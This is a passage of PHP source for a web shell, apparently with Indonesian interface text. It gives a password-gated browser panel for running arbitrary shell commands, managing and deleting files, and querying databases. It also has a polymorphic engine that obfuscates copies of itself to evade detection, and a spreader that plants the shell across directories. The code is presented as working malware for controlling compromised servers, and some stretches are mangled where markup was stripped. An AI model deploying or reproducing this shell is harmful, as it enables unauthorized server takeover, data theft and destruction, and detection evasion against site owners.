Password: '); } // Persistent working directory if (!isset($_SESSION['cwd'])) { $_SESSION['cwd'] = getcwd(); } else { chdir($_SESSION['cwd']); } $self_path = realpath(__FILE__); if ($self_path === false) { $self_path = __FILE__; } function find_dir_by_name($base, $name, $max_depth = 5) { $queue = [[$base, 0]]; while ($queue) { $current = array_shift($queue); $dir = $current[0]; $depth = $current[1]; if ($depth > $max_depth) continue; $items = @scandir($dir); if ($items === false) continue; foreach ($items as $item) { if ($item === '.' || $item === '..') continue; $path = $dir . DIRECTORY_SEPARATOR . $item; if (is_dir($path)) { if ($item === $name) return $path; if (!is_link($path)) { $queue[] = [$path, $depth + 1]; } } } } return null; } // Handle directory change via POST (no password in URL) if (isset($_POST['cd'])) { $newdir = $_POST['cd']; if (chdir($newdir)) { $_SESSION['cwd'] = getcwd(); if ($is_ajax_request) { die('SUCCESS'); } header("Location: ?"); exit; } else { $dir_name_only = strpos($newdir, '/') === false && strpos($newdir, '\\') === false; if ($dir_name_only && $newdir !== '') { $found = find_dir_by_name($_SESSION['cwd'], $newdir, 6); if ($found !== null && chdir($found)) { $_SESSION['cwd'] = getcwd(); if ($is_ajax_request) { die('SUCCESS'); } header("Location: ?"); exit; } } if ($is_ajax_request) { die('ERROR: Cannot change to ' . $newdir); } $cd_error = "Cannot change to $newdir"; } } // ======================================================== // Real-time command execution (unchanged) // ======================================================== function realtime_exec($cmd) { set_time_limit(0); ob_implicit_flush(true); ob_end_flush(); header("Cache-Control: no-store, no-cache, must-revalidate, max-age=0"); header("Pragma: no-cache"); header("Expires: Sat, 26 Jul 1997 05:00:00 GMT"); $descriptors = [ 0 => ['pipe', 'r'], 1 => ['pipe', 'w'], 2 => ['pipe', 'w'] ]; $process = proc_open($cmd, $descriptors, $pipes, $_SESSION['cwd']); if (is_resource($process)) { fclose($pipes[0]); while ($line = fgets($pipes[1])) { echo htmlspecialchars($line); flush(); } while ($line = fgets($pipes[2])) { echo '' . htmlspecialchars($line) . ''; flush(); } fclose($pipes[1]); fclose($pipes[2]); proc_close($process); } else { echo "Failed to execute command."; } } function ini_bytes($val) { $val = trim((string)$val); if ($val === '') return 0; $last = strtolower($val[strlen($val) - 1]); $num = (float)$val; if ($last === 'g') return (int)($num * 1024 * 1024 * 1024); if ($last === 'm') return (int)($num * 1024 * 1024); if ($last === 'k') return (int)($num * 1024); return (int)$num; } function js_escape($str) { $str = str_replace("\\", "\\\\", $str); $str = str_replace("'", "\\'", $str); return $str; } function sanitize_local_name($name) { $name = str_replace(["\\", "/", "\0"], '', (string)$name); return basename(trim($name)); } function format_bytes_php($bytes, $precision = 2) { if (!is_numeric($bytes) || $bytes < 0) return 'Unknown'; $bytes = (float)$bytes; if ($bytes === 0.0) return '0 Bytes'; $units = ['Bytes', 'KB', 'MB', 'GB', 'TB', 'PB']; $pow = (int)floor(log($bytes, 1024)); $pow = max(0, min($pow, count($units) - 1)); $value = $bytes / pow(1024, $pow); return round($value, $precision) . ' ' . $units[$pow]; } function get_command_output($command) { if (!function_exists('shell_exec')) return null; $disabled = array_map('trim', explode(',', (string)ini_get('disable_functions'))); if (in_array('shell_exec', $disabled, true)) return null; $result = @shell_exec($command); if (!is_string($result)) return null; $result = trim($result); return $result === '' ? null : $result; } function get_server_os_info() { return [ 'family' => defined('PHP_OS_FAMILY') ? PHP_OS_FAMILY : PHP_OS, 'name' => php_uname('s'), 'release' => php_uname('r'), 'machine' => php_uname('m'), ]; } function get_cpu_info() { $family = defined('PHP_OS_FAMILY') ? PHP_OS_FAMILY : PHP_OS; $model = 'Unknown'; $cores = null; $load = null; if ($family === 'Windows') { $env_cores = getenv('NUMBER_OF_PROCESSORS'); if ($env_cores !== false && ctype_digit((string)$env_cores)) { $cores = (int)$env_cores; } $wmic = get_command_output('wmic cpu get Name /value 2>NUL'); if ($wmic && preg_match('/Name=(.+)/i', $wmic, $m)) { $model = trim($m[1]); } } elseif ($family === 'Linux') { if (is_readable('/proc/cpuinfo')) { $cpuinfo = @file('/proc/cpuinfo', FILE_IGNORE_NEW_LINES | FILE_SKIP_EMPTY_LINES); if (is_array($cpuinfo)) { $processor_count = 0; foreach ($cpuinfo as $line) { if ($model === 'Unknown' && stripos($line, 'model name') === 0) { $parts = explode(':', $line, 2); if (isset($parts[1])) $model = trim($parts[1]); } if (preg_match('/^processor\s*:/i', $line)) { $processor_count++; } } if ($processor_count > 0) $cores = $processor_count; } } if ($cores === null) { $nproc = get_command_output('nproc 2>/dev/null'); if ($nproc !== null && ctype_digit($nproc)) { $cores = (int)$nproc; } } } else { $brand = get_command_output('sysctl -n machdep.cpu.brand_string 2>/dev/null'); if ($brand !== null) { $model = $brand; } $cpu_count = get_command_output('sysctl -n hw.ncpu 2>/dev/null'); if ($cpu_count !== null && ctype_digit($cpu_count)) { $cores = (int)$cpu_count; } } if ($family !== 'Windows' && function_exists('sys_getloadavg')) { $loads = @sys_getloadavg(); if (is_array($loads) && isset($loads[0], $loads[1], $loads[2])) { $load = implode(' / ', array_map(function ($value) { return number_format((float)$value, 2); }, $loads)); } } return [ 'model' => $model, 'cores' => $cores, 'load' => $load, ]; } function get_memory_info() { $family = defined('PHP_OS_FAMILY') ? PHP_OS_FAMILY : PHP_OS; $total = null; $available = null; if ($family === 'Linux' && is_readable('/proc/meminfo')) { $meminfo = @file_get_contents('/proc/meminfo'); if ($meminfo !== false) { if (preg_match('/^MemTotal:\s+(\d+)\s+kB/im', $meminfo, $m)) { $total = (int)$m[1] * 1024; } if (preg_match('/^MemAvailable:\s+(\d+)\s+kB/im', $meminfo, $m)) { $available = (int)$m[1] * 1024; } elseif (preg_match('/^MemFree:\s+(\d+)\s+kB/im', $meminfo, $free)) { $available = (int)$free[1] * 1024; } } } elseif ($family === 'Windows') { $wmic = get_command_output('wmic OS get TotalVisibleMemorySize,FreePhysicalMemory /value 2>NUL'); if ($wmic) { if (preg_match('/TotalVisibleMemorySize=(\d+)/i', $wmic, $m)) { $total = (int)$m[1] * 1024; } if (preg_match('/FreePhysicalMemory=(\d+)/i', $wmic, $m)) { $available = (int)$m[1] * 1024; } } } else { $memsize = get_command_output('sysctl -n hw.memsize 2>/dev/null'); if ($memsize !== null && ctype_digit($memsize)) { $total = (int)$memsize; } $vmstat = get_command_output('vm_stat 2>/dev/null'); if ($vmstat && preg_match('/page size of (\d+) bytes/i', $vmstat, $page_match)) { $page_size = (int)$page_match[1]; $pages = 0; if (preg_match('/Pages free:\s+(\d+)\./i', $vmstat, $m)) $pages += (int)$m[1]; if (preg_match('/Pages inactive:\s+(\d+)\./i', $vmstat, $m)) $pages += (int)$m[1]; if (preg_match('/Pages speculative:\s+(\d+)\./i', $vmstat, $m)) $pages += (int)$m[1]; if ($pages > 0) $available = $pages * $page_size; } } $used = null; $percent = null; if ($total !== null && $available !== null) { $used = max(0, $total - $available); if ($total > 0) { $percent = round(($used / $total) * 100, 1); } } return [ 'total' => $total, 'available' => $available, 'used' => $used, 'percent' => $percent, ]; } function get_storage_info($path) { $total = @disk_total_space($path); $free = @disk_free_space($path); if ($total === false) $total = null; if ($free === false) $free = null; $used = null; $percent = null; if ($total !== null && $free !== null) { $used = max(0, $total - $free); if ($total > 0) { $percent = round(($used / $total) * 100, 1); } } return [ 'path' => $path, 'total' => $total, 'free' => $free, 'used' => $used, 'percent' => $percent, ]; } // ======================================================== // ADVANCED POLYMORPHIC ENGINE – makes every child unique // ======================================================== /** * Obfuscate a string with a random method */ function obfuscate_string($str) { $methods = ['base64', 'rot13', 'hex', 'reverse']; $m = $methods[array_rand($methods)]; switch ($m) { case 'base64': $enc = base64_encode($str); return "base64_decode('$enc')"; case 'rot13': $enc = str_rot13($str); return "str_rot13('$enc')"; case 'hex': $hex = bin2hex($str); return "hex2bin('$hex')"; case 'reverse': $rev = strrev($str); return "strrev('$rev')"; } } /** * Recursively rename variables inside a function body (simple scope‑aware) * This is a simplified version – for real production a tokenizer would be better. */ function rename_variables_in_code($code, &$name_map) { // Find all $variable names (including $this and static:: are ignored) return preg_replace_callback('/\$([a-zA-Z_\x7f-\xff][a-zA-Z0-9_\x7f-\xff]*)/', function($m) use (&$name_map) { $var = $m[1]; // Skip superglobals if (in_array($var, ['GLOBALS', '_SERVER', '_GET', '_POST', '_FILES', '_COOKIE', '_SESSION', '_REQUEST', '_ENV'])) { return $m[0]; } if (!isset($name_map[$var])) { $name_map[$var] = 'v' . bin2hex(random_bytes(4)); } return '$' . $name_map[$var]; }, $code); } /** * Generate a heavily obfuscated variant of the original source. */ function generate_variant($source) { // ------------------------------------------------------------ // Step 1: Randomly decide to use eval() wrapping for critical parts // This makes the code non‑trivial to parse statically. // ------------------------------------------------------------ $use_eval_wrapper = (rand(0, 2) == 0); // 1/3 chance // ------------------------------------------------------------ // Step 2: Isolate the main logic (everything after the opening PHP tag) // We'll keep the opening tag and the password check, but heavily obfuscate. // ------------------------------------------------------------ // For simplicity, we treat the whole file as one block. // We'll remove the original $new) { // Replace function definition $source = preg_replace('/function\s+(' . preg_quote($old) . ')\s*\(/', 'function ' . $new . '(', $source); // Replace function calls (old_name( -> new_name() $source = str_replace($old . '(', $new . '(', $source); } // Rename variables (careful with superglobals) $source = rename_variables_in_code($source, $var_map); // ------------------------------------------------------------ // Step 5: Inject junk code at random positions // ------------------------------------------------------------ $junk_blocks = [ 'if(rand(0,1)){$x=123;$y=456;$z=$x+$y;unset($x,$y,$z);}', 'for($i=0;$i 0 && $max_post_bytes > 0) { $effective_upload_bytes = min($max_upload_bytes, $max_post_bytes); } elseif ($max_upload_bytes > 0) { $effective_upload_bytes = $max_upload_bytes; } elseif ($max_post_bytes > 0) { $effective_upload_bytes = $max_post_bytes; } $request_too_large_msg = ''; if ($_SERVER['REQUEST_METHOD'] === 'POST') { $content_length = isset($_SERVER['CONTENT_LENGTH']) ? (int)$_SERVER['CONTENT_LENGTH'] : 0; if ($max_post_bytes > 0 && $content_length > $max_post_bytes) { $request_too_large_msg = "

❌ Request too large. post_max_size={$max_post}.

"; } } $server_os = get_server_os_info(); $cpu_info = get_cpu_info(); $memory_info = get_memory_info(); $storage_info = get_storage_info($cwd); $active_tab = 'terminal'; if (isset($_GET['edit']) || isset($_GET['view']) || isset($_FILES['upload']) || isset($_POST['new_file_create']) || isset($_POST['bulk_delete']) || isset($_GET['download']) || isset($_GET['delete'])) { $active_tab = 'files'; } elseif (isset($_POST['db_connect']) || isset($_POST['db_disconnect']) || isset($_POST['db_run_sql']) || isset($_GET['db_table'])) { $active_tab = 'database'; } elseif (isset($_POST['cd']) || isset($_POST['spread'])) { $active_tab = 'tools'; } if (isset($_GET['tab']) && in_array($_GET['tab'], ['terminal', 'files', 'database', 'tools'], true)) { $active_tab = $_GET['tab']; } // Command execution if (isset($_POST['cmd'])) { $cmd = $_POST['cmd']; if (isset($_POST['realtime']) && $_POST['realtime'] == '1') { // realtime_exec() already sends headers, but we need to ensure no extra output before it realtime_exec($cmd); exit; } else { $output = "
" . htmlspecialchars(shell_exec($cmd)) . "
"; } } // File upload if (isset($_FILES['upload'])) { if ($request_too_large_msg !== '') { $action_result = $request_too_large_msg; } else { $file = $_FILES['upload']; $error = isset($file['error']) ? $file['error'] : UPLOAD_ERR_NO_FILE; if ($error !== UPLOAD_ERR_OK) { $err_map = [ UPLOAD_ERR_INI_SIZE => "File exceeds upload_max_filesize ({$max_upload}).", UPLOAD_ERR_FORM_SIZE => "File exceeds MAX_FILE_SIZE.", UPLOAD_ERR_PARTIAL => "File only partially uploaded.", UPLOAD_ERR_NO_FILE => "No file uploaded.", UPLOAD_ERR_NO_TMP_DIR => "Missing temporary folder.", UPLOAD_ERR_CANT_WRITE => "Failed to write file to disk.", UPLOAD_ERR_EXTENSION => "Upload stopped by extension.", ]; $msg = isset($err_map[$error]) ? $err_map[$error] : "Upload error."; $action_result = "

❌ {$msg}

"; } else { $orig = basename($file['name']); $diru = $_SESSION['cwd']; if (!is_dir($diru) || !is_writable($diru)) { $action_result = "

❌ Upload failed. Target directory not writable.

"; } elseif (!is_uploaded_file($file['tmp_name'])) { $action_result = "

❌ Upload failed. Temporary upload not found.

"; } elseif (isset($file['size']) && (int)$file['size'] === 0) { $action_result = "

❌ Upload failed. File size is 0 bytes.

"; } else { $rename = isset($_POST['upload_name']) ? trim($_POST['upload_name']) : ''; $final = $orig; if ($rename !== '') { $rename = str_replace(["\\", "/", "\0"], '', $rename); $rename = trim($rename); $rename = basename($rename); if ($rename !== '') { $final = $rename; if (strpos($final, '.') === false) { $ext = pathinfo($orig, PATHINFO_EXTENSION); if ($ext !== '') $final .= '.' . $ext; } } } $final = preg_replace('/[^\w.\- ]+/u', '_', $final); $target = $diru . DIRECTORY_SEPARATOR . $final; if (file_exists($target)) { $n = pathinfo($final, PATHINFO_FILENAME); $e = pathinfo($final, PATHINFO_EXTENSION); $i = 1; do { $cand = $n . '-' . $i . ($e !== '' ? '.' . $e : ''); $target = $diru . DIRECTORY_SEPARATOR . $cand; $i++; } while (file_exists($target) && $i < 1000); } if (move_uploaded_file($file['tmp_name'], $target)) { $action_result = "

✅ Uploaded: " . htmlspecialchars(basename($target)) . "

"; } else { $action_result = "

❌ Upload failed.

"; } } } } } // File download if (isset($_GET['download'])) { $download_name = sanitize_local_name($_GET['download']); $file = $_SESSION['cwd'] . DIRECTORY_SEPARATOR . $download_name; if (file_exists($file) && is_file($file)) { header('Content-Description: File Transfer'); header('Content-Type: application/octet-stream'); header('Content-Disposition: attachment; filename="'.basename($file).'"'); header('Expires: 0'); header('Cache-Control: must-revalidate'); header('Pragma: public'); header('Content-Length: ' . filesize($file)); readfile($file); exit; } } // File delete if (isset($_GET['delete'])) { $delete_name = sanitize_local_name($_GET['delete']); $file = $_SESSION['cwd'] . DIRECTORY_SEPARATOR . $delete_name; if (file_exists($file) && is_file($file)) { if (unlink($file)) { $action_result = "

✅ Deleted: " . htmlspecialchars($delete_name) . "

"; } else { $action_result = "

❌ Delete failed.

"; } } } if (isset($_POST['file_name']) && isset($_POST['file_content'])) { $safe_file_name = sanitize_local_name($_POST['file_name']); $file = $_SESSION['cwd'] . DIRECTORY_SEPARATOR . $safe_file_name; if (file_exists($file) && is_file($file)) { if (file_put_contents($file, $_POST['file_content']) !== false) { $action_result = "

✅ Saved: " . htmlspecialchars($safe_file_name) . "

"; } else { $action_result = "

❌ Save failed.

"; } } else { $action_result = "

❌ File not found.

"; } } if (isset($_POST['new_file_create']) && isset($_POST['new_file_name'])) { $name = trim($_POST['new_file_name']); $name = str_replace(["\\", "/", "\0"], '', $name); $name = basename($name); $name = preg_replace('/[^\w.\- ]+/u', '_', $name); if ($name === '' || $name === '.' || $name === '..') { $action_result = "

❌ Nama file tidak valid.

"; } else { $base = $name; $target = $_SESSION['cwd'] . DIRECTORY_SEPARATOR . $base; if (file_exists($target)) { $n = pathinfo($base, PATHINFO_FILENAME); $e = pathinfo($base, PATHINFO_EXTENSION); $i = 1; do { $cand = $n . '-' . $i . ($e !== '' ? '.' . $e : ''); $target = $_SESSION['cwd'] . DIRECTORY_SEPARATOR . $cand; $i++; } while (file_exists($target) && $i < 1000); } $content = isset($_POST['new_file_content']) ? $_POST['new_file_content'] : ''; if (file_put_contents($target, $content) !== false) { $created = basename($target); header("Location: ?edit=" . urlencode($created)); exit; } else { $action_result = "

❌ Gagal membuat file.

"; } } } if (isset($_GET['view']) || isset($_GET['edit'])) { $target_name = isset($_GET['view']) ? sanitize_local_name($_GET['view']) : sanitize_local_name($_GET['edit']); $file = $_SESSION['cwd'] . DIRECTORY_SEPARATOR . $target_name; if (file_exists($file) && is_file($file)) { $content = file_get_contents($file); if ($content === false) { $editor_html = "

❌ Failed to read file.

"; } else { $readonly = isset($_GET['view']) ? 'readonly' : ''; $button = isset($_GET['view']) ? '' : ""; $escaped = htmlspecialchars($content); $file_extension = pathinfo($target_name, PATHINFO_EXTENSION); $language = get_language_from_extension($file_extension); $editor_html = "

📝 " . (isset($_GET['view']) ? "View" : "Edit") . " File

" . htmlspecialchars(basename($target_name)) . "" . $language . "
Preview (Live Preview)
" . $escaped . "
Editor
$button
"; } } else { $editor_html = "

❌ File not found.

"; } } // Get language for syntax highlighting function get_language_from_extension($extension) { $languages = [ 'php' => 'php', 'js' => 'javascript', 'html' => 'html', 'css' => 'css', 'py' => 'python', 'java' => 'java', 'cpp' => 'cpp', 'c' => 'c', 'cs' => 'csharp', 'rb' => 'ruby', 'go' => 'go', 'rs' => 'rust', 'ts' => 'typescript', 'json' => 'json', 'xml' => 'xml', 'sql' => 'sql', 'sh' => 'bash', 'bash' => 'bash', 'yml' => 'yaml', 'yaml' => 'yaml', 'md' => 'markdown', 'txt' => 'text', 'ini' => 'ini', 'conf' => 'apacheconf', 'config' => 'apacheconf' ]; return isset($languages[strtolower($extension)]) ? $languages[strtolower($extension)] : 'text'; } // Bulk delete function rrmdir_sekai($dir) { if (is_link($dir)) { return @unlink($dir); } if (!is_dir($dir)) { return @unlink($dir); } $items = scandir($dir); foreach ($items as $i) { if ($i === '.' || $i === '..') continue; $path = $dir . DIRECTORY_SEPARATOR . $i; if (is_dir($path) && !is_link($path)) { rrmdir_sekai($path); } else { @unlink($path); } } return @rmdir($dir); } if (isset($_POST['bulk_delete']) && isset($_POST['sel']) && is_array($_POST['sel'])) { $cwd_bulk = $_SESSION['cwd']; $allowed = array_flip(array_diff(scandir($cwd_bulk), ['.','..'])); $log = []; foreach ($_POST['sel'] as $name) { $name = (string)$name; if ($name === '' || strpos($name, DIRECTORY_SEPARATOR) !== false || $name === '.' || $name === '..') { $log[] = "❌ Skip: " . htmlspecialchars($name) . " (invalid)"; continue; } if (!isset($allowed[$name])) { $log[] = "❌ Skip: " . htmlspecialchars($name) . " (not in current dir)"; continue; } $target = $cwd_bulk . DIRECTORY_SEPARATOR . $name; if (is_dir($target)) { $ok = rrmdir_sekai($target); $log[] = ($ok ? "✅" : "❌") . " Dir: " . htmlspecialchars($name); } else { $ok = @unlink($target); $log[] = ($ok ? "✅" : "❌") . " File: " . htmlspecialchars($name); } } $action_result .= "

🧹 Bulk Delete

" . implode("\n", $log) . "
"; } // Spread action if (isset($_POST['spread'])) { $recursive = isset($_POST['recursive']) ? true : false; $results = spread_shell($recursive); $action_result = "

Spreader Results

" . implode("\n", $results) . "
"; } if ($action_result === '' && $request_too_large_msg !== '') { $action_result = $request_too_large_msg; } if (isset($_POST['db_disconnect'])) { unset($_SESSION['db_cfg']); $db_cfg = null; $db_msg = "

Terputus dari database

"; } if (isset($_POST['db_connect'])) { $driver = isset($_POST['db_driver']) ? $_POST['db_driver'] : 'mysql'; $host = isset($_POST['db_host']) ? trim($_POST['db_host']) : '127.0.0.1'; $port = isset($_POST['db_port']) ? trim($_POST['db_port']) : ''; $name = isset($_POST['db_name']) ? trim($_POST['db_name']) : ''; $user = isset($_POST['db_user']) ? $_POST['db_user'] : ''; $pass = isset($_POST['db_pass']) ? $_POST['db_pass'] : ''; $dsn = ''; if ($driver === 'mysql') { $p = $port !== '' ? $port : '3306'; $dsn = "mysql:host=".$host.";port=".$p.";dbname=".$name; } elseif ($driver === 'pgsql') { $p = $port !== '' ? $port : '5432'; $dsn = "pgsql:host=".$host.";port=".$p.";dbname=".$name; } try { $pdo = new PDO($dsn, $user, $pass, [PDO::ATTR_ERRMODE => PDO::ERRMODE_EXCEPTION, PDO::ATTR_DEFAULT_FETCH_MODE => PDO::FETCH_ASSOC]); $_SESSION['db_cfg'] = ['driver'=>$driver,'host'=>$host,'port'=>$port,'name'=>$name,'user'=>$user,'pass'=>$pass]; $db_cfg = $_SESSION['db_cfg']; $db_connected = true; $db_msg = "

Terhubung ke ".$driver." @ ".$host.($port!==''?":".$port:"")." / ".$name."

"; } catch (Exception $e) { $db_msg = "

Gagal koneksi: ".htmlspecialchars($e->getMessage())."

"; } } function db_make_pdo($cfg) { if (!$cfg) return null; $driver = $cfg['driver']; $host = $cfg['host']; $port = $cfg['port']; $name = $cfg['name']; $user = $cfg['user']; $pass = $cfg['pass']; $dsn = ''; if ($driver === 'mysql') { $p = $port !== '' ? $port : '3306'; $dsn = "mysql:host=".$host.";port=".$p.";dbname=".$name; } elseif ($driver === 'pgsql') { $p = $port !== '' ? $port : '5432'; $dsn = "pgsql:host=".$host.";port=".$p.";dbname=".$name; } else { return null; } try { return new PDO($dsn, $user, $pass, [PDO::ATTR_ERRMODE => PDO::ERRMODE_EXCEPTION, PDO::ATTR_DEFAULT_FETCH_MODE => PDO::FETCH_ASSOC]); } catch (Exception $e) { return null; } } if ($db_cfg && !$db_connected) { $pdo = db_make_pdo($db_cfg); if ($pdo) $db_connected = true; } if ($db_connected) { if (!isset($pdo)) $pdo = db_make_pdo($db_cfg); try { if ($db_cfg['driver'] === 'mysql') { $stmt = $pdo->query("SHOW TABLES"); $db_tables = $stmt ? $stmt->fetchAll(PDO::FETCH_NUM) : []; $db_tables = array_map(function($r){return $r[0];}, $db_tables); } else { $stmt = $pdo->query("SELECT tablename FROM pg_catalog.pg_tables WHERE schemaname NOT IN ('pg_catalog','information_schema')"); $rows = $stmt ? $stmt->fetchAll(PDO::FETCH_ASSOC) : []; $db_tables = array_map(function($r){return $r['tablename'];}, $rows); } } catch (Exception $e) { $db_msg .= "

Gagal ambil tabel: ".htmlspecialchars($e->getMessage())."

"; } $db_limit = isset($_GET['db_limit']) ? max(1, min(1000, intval($_GET['db_limit']))) : 50; if (isset($_GET['db_table'])) { $t = $_GET['db_table']; try { if ($db_cfg['driver'] === 'mysql') { $q = "SELECT * FROM `".$t."` LIMIT ".$db_limit; } else { $q = 'SELECT * FROM "'.$t.'" LIMIT '.$db_limit; } $st = $pdo->query($q); if ($st) { $rows = $st->fetchAll(PDO::FETCH_ASSOC); if (count($rows) > 0) { $cols = array_keys($rows[0]); $html = "

Data: ".htmlspecialchars($t)." (".$db_limit." baris)

"; foreach ($cols as $c) { $html .= ""; } $html .= ""; foreach ($rows as $r) { $html .= ""; foreach ($cols as $c) { $val = isset($r[$c]) ? $r[$c] : null; $html .= ""; } $html .= ""; } $html .= "
".htmlspecialchars($c)."
".htmlspecialchars((string)$val)."
"; $db_result_html = $html; } else { $db_result_html = "

Tabel kosong

"; } } } catch (Exception $e) { $db_result_html = "

Error: ".htmlspecialchars($e->getMessage())."

"; } } if (isset($_POST['db_run_sql']) && isset($_POST['db_sql'])) { $sql = trim($_POST['db_sql']); if ($sql !== '') { try { $st = $pdo->query($sql); if ($st instanceof PDOStatement) { $rows = $st->fetchAll(PDO::FETCH_ASSOC); if (count($rows) > 0) { $cols = array_keys($rows[0]); $html = "

Hasil Query

"; foreach ($cols as $c) { $html .= ""; } $html .= ""; foreach ($rows as $r) { $html .= ""; foreach ($cols as $c) { $val = isset($r[$c]) ? $r[$c] : null; $html .= ""; } $html .= ""; } $html .= "
".htmlspecialchars($c)."
".htmlspecialchars((string)$val)."
"; $db_result_html = $html; } else { $db_result_html = "

Tidak ada baris.

"; } } else { $db_result_html = "

Query dieksekusi.

"; } } catch (Exception $e) { $db_result_html = "

Error: ".htmlspecialchars($e->getMessage())."

"; } } } } // Get current directory listing $cwd = $_SESSION['cwd']; $files = scandir($cwd); $breadcrumbs_html = ''; $parts = preg_split('/[\/\\\\]+/', $cwd, -1, PREG_SPLIT_NO_EMPTY); $crumbs = []; if (preg_match('/^[A-Za-z]:[\/\\\\]/', $cwd)) { $root = substr($cwd, 0, 2) . DIRECTORY_SEPARATOR; $crumbs[] = ''.htmlspecialchars(substr($cwd, 0, 2)).''; } else { $root = DIRECTORY_SEPARATOR; $crumbs[] = ''.htmlspecialchars(DIRECTORY_SEPARATOR).''; } $acc = []; for ($i = 0; $i < count($parts); $i++) { $acc[] = $parts[$i]; $acc_path = $root . implode(DIRECTORY_SEPARATOR, $acc); $label = htmlspecialchars($parts[$i]); if ($i < count($parts) - 1) { $crumbs[] = ''.$label.''; } else { $crumbs[] = ''.$label.''; } } $breadcrumbs_html = implode(' / ', $crumbs); $dir_datalist = ''; foreach ($files as $f) { if ($f === '.' || $f === '..') continue; $full = $cwd . DIRECTORY_SEPARATOR . $f; if (is_dir($full)) { $dir_datalist .= '